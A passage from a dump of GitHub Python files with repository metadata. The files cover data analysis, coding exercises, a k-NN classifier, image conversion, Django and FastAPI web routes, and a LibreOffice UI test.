inplace=True)\nplyrsDF[\"2Prop\"] = (50*np.array([plyrsDF[\"2PA\"][i]/(plyrsDF[\"2PA\"][i] + plyrsDF[\"3PA\"][i]) for i in range(len(plyrsDF[\"2PA\"]))]))**2\nplyrsDF[\"FG%\"] = plyrsDF[\"FG%\"].astype(np.float)\n\n\n# In[6]:\n\n\nX_coords = [[examples[\"2percA\"][i], examples[\"2percB\"][i]] for i in range(len(examples[\"2percA\"]))]\nY_coords = [[examples[\"3percA\"][i], examples[\"3percB\"][i]] for i in range(len(examples[\"3percA\"]))]\n\n\n# ## Graphic explanation\n# In the following graphic, I've plotted \n# 1. 2-pointer field goal percentage (2P%, x-axis),\n# 2. 3-pointer field goal percentage (3P%, y-axis),\n# 3. Overall field goal percentage (FG%, color of the markers),\n# 4. Relative proportion of field goal attempts that are 2-pointers (size of markers)\n# for the top 25 scorers, and\n# 5. Line segments connecting pairs of players whose 2P%, 3P%, and FG% satisfy Simpson's paradox\n# \n# One thing you can notice is that a necessary (but not sufficient) condition for a pair of players Player A (better overall FG%) and Player B (better 2P% and 3P%) to satisfy the \"paradox'' is that Player B must be above and to the right of Player A on the graph, but Player A has a larger and darker marker, since Player A shoots more 2s overall. This is under the (not true for all players but true here) assumption that all players shoot 2-pointers at a higher percentage than 3-pointers.\n# \n# The property is also transitive, as exhibited with DeMar DeRozan, Joel Embiid, and Zach Lavine, and also by Dejounte Murray, Anthony Edwards, and Steph Curry.\n# \n# This analysis isn't meant to judge any players as better than others; it's simply an interesting phenomenon that occurs between the best scorers in the league because of their different ways of scoring. \n\n# In[38]:\n\n\nfig = px.scatter(plyrsDF, x=\"2P%\", y=\"3P%\", color = 'FG%', size = \"2Prop\", \n color_continuous_scale=px.colors.sequential.Emrld,\n title=\"Simpson's Paradox Amongst Top NBA Scorers, '21-'22\", hover_name = \"Name\")\n\nfor i in range(len(X_coords)):\n reference_line = go.Scatter(x=X_coords[i],\n y=Y_coords[i],\n mode=\"lines\",\n line=go.scatter.Line(color=\"gray\"),\n showlegend=False)\n fig.add_trace(reference_line, row=1, col=1)\n\n\nfig.show()\n\n","repo_name":"gsarajian/Simpsons-paradox-in-the-NBA","sub_path":"Simpson's paradox amongst the NBA's top scorers.py","file_name":"Simpson's paradox amongst the NBA's top scorers.py","file_ext":"py","file_size_in_byte":8615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12134787570","text":"import math\n\ndef divisors(n):\n div = 1\n for x in range(2,int(n**0.5)+1):\n if (n % x == 0):\n if (n/x == x):\n div += x\n else:\n div += x + n/x \n return int(div) \n\n#def divisors(n):\n# return sum((x for x in range(1, int(n**0.5)+1) if not n % x))\n\ndef buddy(start,limit):\n for n in range(start, limit + 1):\n sum_n = divisors(n) - 1\n if(sum_n > n):\n sum_m = divisors(sum_n) -1\n if (sum_m == n):\n return [n, sum_n]\n return \"Nothing\"\n \nprint(buddy(20,50))\n#print(buddy(100,200))\n#print(buddy(2177, 4357))\n#print(buddy(62700, 62800))\n#print(buddy(1071625, 1103735))\n","repo_name":"hgf777-br/CodeWarsPython","sub_path":"BuddyPairs.py","file_name":"BuddyPairs.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19768558426","text":"from logging import getLogger\n\nfrom youtube_stat.config import Config\nfrom youtube_stat.data.processor import DataProcessor\n\nlogger = getLogger(__name__)\n\n\ndef start(config: Config):\n logger.info(f\"start preprocess\")\n PreprocessCommand(config).start()\n\n\nclass PreprocessCommand:\n def __init__(self, config: Config):\n self.config = config\n\n def start(self):\n dp = DataProcessor(self.config)\n dp.parse_text()\n dp.create_dataset()\n dp.convert_to_training_data()\n","repo_name":"mokemokechicken/youtube_stat","sub_path":"src/youtube_stat/command/pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35449838111","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom typing import List, Tuple\r\nfrom math import sqrt\r\nimport numpy as np\r\nimport warnings\r\n#-------------------------------------------------\r\nimport sklearn.utils._typedefs # 쓰는곳도없는데 빼면오류남 .std axis 쪽인듯\r\nfrom sklearn.model_selection import train_test_split # 데이터 나누기 위한 import\r\n#------------------------------------------------- 극히일부사용 편리용\r\nimport time\r\n\r\nwarnings.filterwarnings('ignore')\r\nprint(\"satisfaction_data.csv의 파일명에 해당하는 데이터파일을 같은 디렉토리안에 넣으세요. \") \r\n\r\n#file_name=input()# 사용시 입력받는 값이 하나씩 밀려서 오류가남\r\n\r\ncol_names = ['Hours_per_week', 'Workclass','Martial-status', 'Fnlwgt','Age','Educational-num','satisfaction']\r\ndataset = pd.read_csv(\"satisfaction_data.csv\", encoding='UTF-8', header=None, names=col_names)\r\nprint(\"분류중입니다....\")\r\nstart = time.time() # 시간측정 시작\r\nX_1 = dataset.iloc[:,0:4].to_numpy() # DataFrame을 np.ndarray로 변환\r\nX_2 = dataset.iloc[:,4:6].to_numpy() # 이중 분석에 필요없는 교육번호를 제외한 0,1,2,4,5의 column을가져옴 -> 수정)제외한걸다시넣음\r\nX = np.hstack((X_1, X_2)) # 분리된 np.array부분을 합침\r\n\r\ny = dataset.iloc[:, -1].to_numpy() # 만족도 column만 분리\r\n#print(y)\r\n\r\n\r\ndef dimension_decrease(dataz):\r\n #dataz = (dataz-dataz.min())/(dataz.max() - dataz.min()) # 표준화 진행\r\n norm_dataz = dataz-dataz.mean(axis=0)\r\n norm_dataz = norm_dataz/dataz.std(axis=0) # 표준화진행 2 dataz\r\n \r\n cov_norm_dataz = np.cov(norm_dataz.T) # Convariance Matrix 구하기\r\n \r\n eigen_val, eigen_vec = np.linalg.eig(cov_norm_dataz)\r\n #print(eigen_val)\r\n #print(eigen_vec)\r\n\r\n z1 = eigen_vec[:,0][0] * norm_dataz[:,0] + eigen_vec[:,0][1] * norm_dataz[:,1] + eigen_vec[:,0][2] * norm_dataz[:,2]\r\n z2 = eigen_vec[:,1][0] * norm_dataz[:,0] + eigen_vec[:,1][1] * norm_dataz[:,1] + eigen_vec[:,1][2] * norm_dataz[:,2]\r\n z3 = eigen_vec[:,2][0] * norm_dataz[:,0] + eigen_vec[:,2][1] * norm_dataz[:,1] + eigen_vec[:,2][2] * norm_dataz[:,2]\r\n z4 = eigen_vec[:,3][0] * norm_dataz[:,0] + eigen_vec[:,3][1] * norm_dataz[:,1] + eigen_vec[:,3][2] * norm_dataz[:,2]\r\n z5 = eigen_vec[:,4][0] * norm_dataz[:,0] + eigen_vec[:,4][1] * norm_dataz[:,1] + eigen_vec[:,4][2] * norm_dataz[:,2]\r\n z6 = eigen_vec[:,5][0] * norm_dataz[:,0] + eigen_vec[:,5][1] * norm_dataz[:,1] + eigen_vec[:,5][2] * norm_dataz[:,2]\r\n dataz_pca_res = np.vstack([z1,z2,z3,z4,z5,z6]).T # X_train에 대한 PCA를 통한 차원 축소완료\r\n #print(dataz_pca_res[:,:2])\r\n return dataz_pca_res[:,:6] # 원하는 차원수만큼 축소해서 사용하면됨\r\n\r\n\r\ndef euclidean_distance(row1, row2): # 다차원 유클리디언 거리측정\r\n\tdistance = 0.0\r\n\tfor i in range(len(row1)):\r\n\t\tdistance += (row1[i] - row2[i])**2\r\n\treturn sqrt(distance)\r\n\r\ndef k_nn_discrimination(X_train, y_train,k,row0,d_d): # k는 k값 row0은 테스트 데이터에서 판별하고자 하는 featue의 값\r\n\r\n #k = 29 # k값 최초설정 임의의값 나중에 변하게 만들꺼 홀수값\r\n\r\n distance_list = []\r\n #d_d = dimension_decrease(X_train) 원래안에있었지만 계산량이 많아져서 밖으로뺌\r\n # 여러번 사용하기에 변수화시킴 , 원하는차원으로 차원축소시킨 feature값\r\n #row0 = [0.2,0.2] # 가짜 feature 나중에 내가 구하고자 하는 값 넣을거\r\n \r\n for row in d_d:\r\n distance_list.append(euclidean_distance(row0, row)) # 테스트 데이터 row0 과 훈련데이터 row를 비교 \r\n #print(d_d.shape) # feature값 차원확인\r\n #print(y_train.shape) # train의 정답 차원확인\r\n\r\n \r\n # 측정거리를 순서대로 나열 k에 해당하는 거리를 찾기위해\r\n sorted_list = sorted(distance_list)\r\n index = []\r\n #print(len(sorted_list)) # 제대로 출력되는지 길이확인\r\n #print(sorted_list) # 출력값확인\r\n for i in range(k):\r\n index.append(distance_list.index(sorted_list[i])) # k개에 해당하는 가장가까운 값들을 훈련 데이터에서 찾아서 index list에 index값으로넣음\r\n\r\n count = 0\r\n for i in index:\r\n #print(i)\r\n if y_train[i] == 'satisfied': # 만약 그 안에있는 값이 satisfied이면\r\n count+=1 # 카운터를 1증가시킴\r\n if count*2 >= k : # 카운터 값이 k의 절반이상이면\r\n result = 0 # 0이면 satisfied\r\n else:\r\n result = 1 # 1이면 unsatisfied로 판단한다.\r\n return count, result # count = k개안에있는 satisfied의 수 result = 0이면 satisfied로 판별 1이면 unssatisfied로 판별\r\n #print(y_train[1])\r\n #print(count)\r\n\r\n\r\n\r\n\r\ncorrect =0# 초기화\r\niterationz = 10\r\nresult_final = []\r\n\r\n\r\nfor count in range(iterationz):\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1) # 데이터 세트를 1:9로 나눔\r\n X_test_2d=dimension_decrease(X_test) # 2차원특징 벡터로 축소시킨 X_test_2d -> 수정 다차원으로 변경\r\n d_d = dimension_decrease(X_train) \r\n result_k_nn_result_Test = []\r\n #result_k_nn_count = [] # 안에있는 count의 값 분석할때 쓸것\r\n for i in X_test_2d:\r\n T=k_nn_discrimination(X_train, y_train,29,i,d_d) # 판별시행\r\n #result_k_nn_count.append(T[0]) # 안에있는 count 값 분석할때 쓸것\r\n result_k_nn_result_Test.append(T[1]) #dicrimination에서 나온 결괏값추출\r\n\r\n\r\n result_sat = []\r\n for i in range(len(y_test)): # 테스트 데이터에 대해 맞춘갯수 세기\r\n if y_test[i] == 'satisfied': # 데이터추출\r\n z = 0\r\n \r\n if y_test[i] == 'unsatisfied':\r\n z = 1\r\n \r\n if z==result_k_nn_result_Test[i]:\r\n correct +=1\r\n for i in range(len(result_k_nn_result_Test)): # 만족인 불만족인지 데이터 추출\r\n if result_k_nn_result_Test[i] == 0 :\r\n result_sat.append('satisfied')\r\n if result_k_nn_result_Test[i] == 1:\r\n result_sat.append(\"unsatisfied\")\r\n result_final.extend(result_sat)\r\n if count == 0 : ## 처음에는 결괏값이 비어있기에 차원합병이불가능하기에 차원초기화해줌\r\n X_fin = X_test\r\n y_fin = y_test\r\n else: ## 처음다음에는 합병\r\n X_fin=np.vstack ([X_fin, X_test])\r\n y_fin=np.vstack ([y_fin, y_test])\r\naccuracy = correct/((len(y_test)*iterationz)) # 정확도 측정\r\nprint(\"결과와 예측이 일치한 총 개수 = \", correct)\r\nprint(\"accuracy = \",accuracy) # 정확도 출력\r\n\r\nprint(\"분석한 결과를 기존파일 맨오른쪽칸에 예측결과를 추가\")\r\n\r\n#print(len(X_train), len(X_test)) # 잘나뉘었는지 확인\r\n\r\n#print(X_train[:3]) # 임의로 나뉜 x_train에서 3개에 data에 대해 검사\r\n#print(y_train[:3]) # 임의로 나뉜 y_train에서 3개의 data에 대해 검사\r\n\r\n\r\n#print(X_train) # 표준화된 X_train 확인\r\n\r\n#print(dataset.shape) # (row개수, column개수)\r\n#print(dataset.info()) # 데이터 타입, row 개수, column 개수, 컬럼 데이터 타입\r\n#print(dataset.describe()) # 요약 통계 정보\r\n\r\n\r\n#print(k_nn_discrimination(X_train, y_train,100,[0.2,0.2])) 제대로 실행되는지 test\r\nresult_data_csv=np.hstack([X_fin,y_fin.reshape((iterationz*len(y_test)),1),(np.array(result_final).reshape(len(result_final),1))])\r\ndataframe= pd.DataFrame(result_data_csv,columns = ['Hours_p_w', 'Wclass','Martial-st', 'Fnlwgt','Age','E-num','satis','expect-sat'])\r\ndataframe.to_csv(\"20164064.csv\",header=False,index=False) # data를 헤더포함시켜서 csv파일로불러내기 # header =true로 바꾸면 헤더가표현된다.\r\nprint(\"파일출력완료\")\r\nprint(\"time(걸린시간) :\", time.time() - start) # 실행시간측정\r\ninput(\"Input any key to End the program...\")\r\n\r\n","repo_name":"hajeehoon12/K-nn-Classifier","sub_path":"k-nnclassifier.py","file_name":"k-nnclassifier.py","file_ext":"py","file_size_in_byte":7990,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70306495525","text":"# we can concatenate tow list using the +\na = [1, 2, 3, 4]\nb = [5, 6, 7, 8]\nc = a+b\nprint(c)\n\n# len() -> to get the length of values in the array\nprint(len(b))\n\n# max() and min(), we can get the maximum as well as minimum value in an array\nprint(max(b))\nprint(min(b))\n\n# sum() -> to find sum of all elements in a list\nprint(sum(b))\n\n# tp get average, we can use sum/len\nprint(sum(b)//len(b))\n\n# my_list = []\n# while True:\n# inp = input('Enter your number: ')\n# if inp == 'done':\n# break\n# value = float(inp)\n# my_list.append(value)\n# average = sum(my_list) / len(my_list)\n\n# print('Average:', average)\n\n# we can convert a string to a list by using the list(), eg\nd = 'feranmi'\nprint(list(d))\n\n# we can also split words into list\ne = 'feranmi emmanuel adeyemi'\nslp = 'a'\nf = e.split(slp)\nprint(f)\n# nb, if i were to do list(e), it will convert each letter and spaces to strings in an array\n\n# list-string, use join()\nprint(slp.join(f))\n\nnew_arr = [-1, 10, -20, 2, -90, 60, 45, 20]\nsolution = [i*i for i in new_arr if i < 0]\nnegative_no = [number if number >\n 0 else 'negative number' for number in new_arr]\nprint(solution)\nprint(negative_no)\n\n# arr = [1, 2, 3, 4, 5, 6]\n# for i in range(1, 6):\n# print(arr[i])\n# arr[i - 1] = arr[i]\n# for i in range(0, 6):\n# print(arr[i], end = \" \")\n\n\nfruit_list1 = ['Apple', 'Berry', 'Cherry', 'Papaya']\nfruit_list2 = fruit_list1\nprint(fruit_list2)\nfruit_list3 = fruit_list1[:]\n\nfruit_list2[0] = 'Guava'\nfruit_list3[1] = 'Kiwi'\n\nprint(fruit_list1)\nprint(fruit_list2)\nprint(fruit_list3)\n\nsum = 0\nfor ls in (fruit_list1, fruit_list2, fruit_list3):\n if ls[0] == 'Guava':\n sum += 1\n if ls[1] == 'Kiwi':\n sum += 20\n\n# print(sum)\n\ndata = [[[1, 2], [3, 4]], [[5, 6], [7, 8]]]\ndef fun(m):\n v = m[0][0]\n \n for row in m:\n for element in row:\n if v < element: v = element\n \n return v\n# print(fun(data[0]))\n\ndef f(value, values):\n v = 1\n values[0] = 44\nt = 3\nv = [1, 2, 3]\nf(t, v)\n# print(t, v[0])\n\na=[1,2,3,4,5]\n# print(a[3:0:-1])\n# print(a[2:0:-2])\nprint(a[::2])\n\narr = [[1, 2, 3, 4],\n [4, 5, 6, 7],\n [8, 9, 10, 11],\n [12, 13, 14, 15]]\nfor i in range(0, 4):\n print(arr[i].pop())\n \na=[1,2,3,4,5,6,7,8,9]\na[::2]=10,20,30,40,50,60\nprint(a)\n","repo_name":"K-Honsu/DSA-Learning","sub_path":"arrays/list/list_operations.py","file_name":"list_operations.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3706971844","text":"# -*- coding: utf-8 -*-\n\"\"\"\n author: weihuan\n date: 2020/4/17 0:45\n\"\"\"\n\nimport io\nimport os\nimport codecs\nimport struct\nimport numpy as np\nfrom PIL import Image\n\n# 本程序将 hwdb2.0 图片转化为 png 格式图片和标签\n\ngen_test_data = True # 如果产生测试图片写 True, 训练集写 False\n\ndatapath = r'C:\\Users\\weihuan\\Desktop\\data2'\nTRAIN_SOURCE_PATH = os.path.join(datapath,'HWDB2.2Train')\nTRAIN_SAVE_PATH = os.path.join(datapath,'train')\n\nTEST_SOURCE_PATH = os.path.join(datapath,'HWDB2.2Test')\nTEST_SAVE_PATH = os.path.join(datapath,'test')\n\nbad_image = False\n\nstep = 40000\niter = 0\n\n\nimg_root = TEST_SOURCE_PATH if gen_test_data else TRAIN_SOURCE_PATH\nlabel_txt = 'testlabels.txt' if gen_test_data else 'trainlabels.txt'\nfile_num = len(os.listdir(img_root))\nsavepath = TEST_SAVE_PATH if gen_test_data else TRAIN_SAVE_PATH\nlabelwriter = open(os.path.join(datapath,label_txt),'w+',encoding = 'utf-8')\n\nfor fname in os.listdir(img_root):\n iter = iter + 1\n print('[{}/{}]'.format(iter,file_num))\n fname_root = os.path.join(img_root, fname)\n with codecs.open(fname_root, mode = 'rb') as fin:\n while True:\n try:\n dgrlhsize = fin.read(4)\n dgrlhsize = struct.unpack(\"I\", dgrlhsize)[0]\n except :\n break\n format_code = fin.read(8)\n illuslen = dgrlhsize - 36\n illuslen = fin.read(illuslen)\n codetype = fin.read(20)\n codelen = fin.read(2)\n codelen = struct.unpack('h', codelen)[0]\n bitspp = fin.read(2)\n\n # 图片高宽\n pageHei = fin.read(4)\n pageHei = struct.unpack('I', pageHei)[0]\n pageWid = fin.read(4)\n pageWid = struct.unpack('I', pageWid)[0]\n\n # 图片行数\n lineNumber = fin.read(4)\n lineNumber = struct.unpack('I', lineNumber)[0]\n\n for i in range(lineNumber):\n # 读取标签\n charNumber = (struct.unpack('I', fin.read(4))[0])\n label = fin.read(charNumber * codelen)\n label = label.replace(b'\\x00',b'')\n label = label.replace(b'\\xff',b'')\n try:\n label = str(label,('gbk')).encode('utf-8').decode('utf-8')\n except Exception as e:\n print('error' + str(e))\n bad_image = True\n\n # 读取图像\n lineTop = struct.unpack('I', fin.read(4))[0]\n lineLeft = struct.unpack('I', fin.read(4))[0]\n lineHei = struct.unpack('I', fin.read(4))[0]\n lineWid = struct.unpack('I', fin.read(4))[0]\n\n # 读取并转为灰度图像\n bytes_image = fin.read(lineHei* lineWid)\n image = Image.frombytes(mode = 'L' ,data = bytes_image,size = (lineWid,lineHei))\n\n if not bad_image:\n step += 1\n image_name = str(step).rjust(9,'0')+'.png'\n savename = os.path.join(savepath,image_name)\n labelwriter.writelines(image_name +'|'+label+'\\n')\n image.save(savename)\n bad_image = False\nlabelwriter.close()\n","repo_name":"whutweihuan/DeepLearing","sub_path":"main24.py","file_name":"main24.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29025650049","text":"import sys\nimport csv\nimport gpxpy\n\ngpx = gpxpy.gpx.GPX()\nreader = csv.DictReader(sys.stdin)\nfor row in reader:\n w = gpxpy.gpx.GPXWaypoint(\n latitude=row[\"Lat\"],\n longitude=row[\"Lng\"],\n name=row[\"Location\"],\n type=row[\"Type\"],\n )\n gpx.waypoints.append(w)\n\nsys.stdout.write(gpx.to_xml())\n","repo_name":"larsks/massjam2023-gis","sub_path":"gengpx.py","file_name":"gengpx.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72576992485","text":"from django.shortcuts import render\n\nfrom django.db import connection\n\nfrom django.http import HttpResponse, JsonResponse\nfrom rest_framework.views import APIView\n\nfrom .models import DouyinUser\nfrom clothing.util.getGood import get_douyin_user\n\n\ndef get_user_name(request):\n code = request.GET.get('code')\n query = f\"\"\"\n SELECT\n u.name\n FROM\n taiwei_orders as o\n LEFT JOIN taiwei_user as u\n ON o.sub_order_no = u.sub_order_no\n WHERE DATE(o.order_submit_time) >= CURDATE() - INTERVAL 30 DAY\n AND o.merchant_code LIKE '%{code}%'\n AND u.name is not null\n \"\"\"\n with connection.cursor() as cursor:\n cursor.execute(query)\n result = cursor.fetchall()\n user_list = []\n for i in result:\n user_list.append(i[0])\n return JsonResponse({\"data\": user_list})\n\n\nclass douYinUser(APIView):\n def post(self, request):\n user_info = request.data\n douyin_list = []\n for item in user_info:\n douyin = DouyinUser(\n douyin_id=item['douyin_id'],\n is_fan_group=item['is_fan_group'],\n style_number=item['style_number'],\n time=item['time'],\n username=item['username'],\n )\n douyin_list.append(douyin)\n\n try:\n inserted_count = DouyinUser.objects.bulk_create(douyin_list)\n return JsonResponse({'message': f'{len(inserted_count)} 条数据更新成功。'})\n except Exception as e:\n return JsonResponse({'error': str(e)}, status=500)\n\n\ndef get_live_douyin_user(request):\n response = get_douyin_user()\n return JsonResponse({'message': response})\n","repo_name":"wangrenzu/taiwei","sub_path":"clothing/clothing/apps/phone/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27426571566","text":"import heapq\n# 힙을사용하면 최소힙으로 정렬된다. 그래서 k시간이전에 다 먹어 버리는 경우는 음식을 빼주고 시간도 빼준다.\n# 해당 음식을 다 먹는 시간이 k를 넘어가면 뒤에 남아있는 것은 모두 시간이 남는 것 이므로 그 중에서 순서를 구해준다.\ndef solution(food_times, k):\n answer = -1\n q =[]\n for i in range(len(food_times)):\n heapq.heappush(q,[food_times[i], i+1])\n\n remain_food = len(food_times)\n previous = 0\n while q:\n time = (q[0][0]-previous)*remain_food\n if(k>=time):\n k -= time\n previous,_ = heapq.heappop(q)\n remain_food -= 1\n else:\n idx = k%remain_food\n q.sort(key=lambda x:x[1])\n answer = q[idx][1]\n break\n return answer\n\n\n\n \nprint(solution([3, 1, 2], 5))","repo_name":"dlckdduq1107/coding_test","sub_path":"Solutions/하루 한문제 코테준비/무지의먹방라이브.py","file_name":"무지의먹방라이브.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"32709462568","text":"from fastapi import APIRouter, Depends, HTTPException, Request, Response, status\nfrom fastapi_pagination.ext.sqlalchemy_future import paginate\nfrom sqlalchemy.orm import Session\nfrom uuid import UUID\n\nfrom api.routes import helpers\nfrom api_models.create import Create\nfrom api_models.metadata_display_type import (\n MetadataDisplayTypeCreate,\n MetadataDisplayTypeRead,\n MetadataDisplayTypeUpdate,\n)\nfrom db import crud\nfrom db.database import get_db\nfrom db.schemas.metadata_display_type import MetadataDisplayType\nfrom db.exceptions import UuidNotFoundInDatabase\n\n\nrouter = APIRouter(\n prefix=\"/metadata/display_type\",\n tags=[\"Display Type\"],\n)\n\n\n#\n# CREATE\n#\n\n\ndef create_display_type(\n create: MetadataDisplayTypeCreate,\n request: Request,\n response: Response,\n db: Session = Depends(get_db),\n):\n obj = crud.metadata_display_type.create_or_read(model=create, db=db)\n db.commit()\n\n response.headers[\"Content-Location\"] = request.url_for(\"get_display_type\", uuid=obj.uuid)\n\n return {\"uuid\": obj.uuid}\n\n\nhelpers.api_route_create(router, create_display_type, response_model=Create)\n\n\n#\n# READ\n#\n\n\ndef get_all_display_types(db: Session = Depends(get_db)):\n return paginate(conn=db, query=crud.metadata_display_type.build_read_all_query())\n\n\ndef get_display_type(uuid: UUID, db: Session = Depends(get_db)):\n try:\n return crud.metadata_display_type.read_by_uuid(uuid=uuid, db=db)\n except UuidNotFoundInDatabase as e:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=str(e)) from e\n\n\nhelpers.api_route_read_all(router, get_all_display_types, MetadataDisplayTypeRead)\nhelpers.api_route_read(router, get_display_type, MetadataDisplayTypeRead)\n\n\n#\n# UPDATE\n#\n\n\ndef update_display_type(\n uuid: UUID,\n display_type: MetadataDisplayTypeUpdate,\n request: Request,\n response: Response,\n db: Session = Depends(get_db),\n):\n try:\n if not crud.helpers.update(uuid=uuid, update_model=display_type, db_table=MetadataDisplayType, db=db):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST, detail=f\"Unable to update metadata display type {uuid}\"\n )\n except UuidNotFoundInDatabase as e:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=str(e)) from e\n\n db.commit()\n\n response.headers[\"Content-Location\"] = request.url_for(\"get_display_type\", uuid=uuid)\n\n\nhelpers.api_route_update(router, update_display_type)\n\n\n#\n# DELETE\n#\n\n\ndef delete_display_type(uuid: UUID, db: Session = Depends(get_db)):\n try:\n if not crud.helpers.delete(uuid=uuid, db_table=MetadataDisplayType, db=db):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST, detail=f\"Unable to delete metadata display type {uuid}\"\n )\n except UuidNotFoundInDatabase as e:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=str(e)) from e\n\n db.commit()\n\n\nhelpers.api_route_delete(router, delete_display_type)\n","repo_name":"seanmcfeely/ace2-ams","sub_path":"db_api/app/api/routes/metadata_display_type.py","file_name":"metadata_display_type.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32487948956","text":"from login.models import Sessao\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.template import RequestContext\nfrom django import http\nfrom django.http import HttpResponse \n\nclass SessaoMiddleware(object): \n #Construtor necessário para a classe \n def __init__(self, get_response): \n self.get_response = get_response \n \n #Chamada do filtro \n def __call__(self, request): \n\n # vamos pular arquivos estáticos \n if not request.path_info.startswith(\"/static/\"): \n if self.sessionId in request.COOKIES:\n cookie = request.COOKIES[self.sessionId]\n sessao = Sessao.objects.get(id=cookie)\n request.sessao = sessao\n response = self.get_response(request)\n \n if hasattr(request,\"sessao\"):\n #testa se há sessao\n response.set_cookie(self._sessionId, request.sessao.Id)\n else:\n response.delete_cookie(self.sessionId) \n \n return response\n \n #função de excluir sessão\n def sair(request):\n request.sessao.delete()\n \nclass AutorizacaoMiddleware(object):\n \n def __init__(self, get_response):\n self.get_response = get_response\n \n def __call__(self, request):\n path = request.path_info\n if path.startswith(\"/contas/\") and not hasattr(request, \"sessao\"):\n return redirect(\"/login/\")\n else:\n return self.get_response(request)","repo_name":"claudiovrs/simple-crud-django","sub_path":"faculdade/contas/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29170011500","text":"# -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-\n#\n# This file is part of the LibreOffice project.\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\nfrom uitest.framework import UITestCase\nfrom uitest.uihelper.common import select_by_text\nfrom uitest.uihelper.common import get_state_as_dict, get_url_for_data_file\n\n#Bug 124586 - Crash if switch from user outline numbering to chapter numbering with same paragraph style\n\nclass tdf124586(UITestCase):\n def test_tdf124586_crash_switch_outline_numbering(self):\n with self.ui_test.load_file(get_url_for_data_file(\"tdf124586.odt\")) as writer_doc:\n\n #Goto Tools > Chapter Numbering.\n with self.ui_test.execute_dialog_through_command(\".uno:ChapterNumberingDialog\") as xDialog:\n xstyle = xDialog.getChild(\"style\")\n select_by_text(xstyle, \"MyHeading\")\n\n self.assertEqual(writer_doc.Text.String[0:8], \"Schritte\")\n\n with self.ui_test.execute_dialog_through_command(\".uno:ChapterNumberingDialog\") as xDialog:\n xstyle = xDialog.getChild(\"style\")\n self.assertEqual(get_state_as_dict(xstyle)[\"SelectEntryText\"], \"MyHeading\")\n# vim: set shiftwidth=4 softtabstop=4 expandtab:\n","repo_name":"LibreOffice/core","sub_path":"sw/qa/uitest/writer_tests6/tdf124586.py","file_name":"tdf124586.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":2194,"dataset":"github-code","pt":"52"} +{"seq_id":"34692710624","text":"# -*- coding: utf-8 -*-\r\n\r\nimport pygame\r\nfrom random import randint\r\nfrom pygame.sprite import Sprite\r\n\r\nclass Meteor(Sprite):\r\n def __init__(self,screen,settings,meteors,type,x):\r\n super(Meteor, self).__init__()\r\n\r\n self.screen = screen\r\n self.settings = settings\r\n self.meteors = meteors\r\n\r\n self.type = type\r\n self.image = pygame.image.load(\"images/meteor\"+str(self.type)+\r\n \"_\"+str(randint(1,3))+\".png\").convert_alpha()\r\n self.rect = self.image.get_rect()\r\n\r\n self.rect.x = x\r\n self.rect.bottom = 0\r\n self.x = float(self.rect.x)\r\n self.y = float(self.rect.y)\r\n #Скорость по умолчанию\r\n self.speed_drop = 2\r\n #Начальная скорость: устанавливается разработчиком\r\n self.start_speed = 2\r\n\r\n if self.type == 1:\r\n self.speed_drop = randint(self.start_speed,self.start_speed+5)\r\n elif self.type == 2:\r\n self.speed_drop = randint(self.start_speed+2,self.start_speed+5)\r\n else:\r\n self.speed_drop = randint(self.start_speed+3,self.start_speed+5)\r\n\r\n def get_width(self):\r\n return self.rect.width\r\n\r\n def update(self):\r\n self.y += self.speed_drop\r\n self.rect.y = self.y\r\n self.screen.blit(self.image, self.rect)\r\n","repo_name":"admiralZz/Space-Invasion","sub_path":"meteor.py","file_name":"meteor.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44000632564","text":"import geopandas as gpd\nimport numpy as np\nimport pandas as pd\nfrom aequilibrae.project import Project\nfrom shapely.geometry import Point, Polygon, box\n\nfrom tradesman.data.load_zones import load_zones\nfrom tradesman.data_retrieval.osm_tags.generic_tag import generic_tag\nfrom tradesman.data_retrieval.osm_tags.osm_tag_values import amenity_values, building_values\n\n\nclass ImportOsmData:\n \"\"\"\n Triggers the import of OSM data and saves it into the database.\n\n Parameters:\n *tag*(:obj:`str`): data tag to download\n *project*(:obj:`aequilibrae.project`): currently open project\n 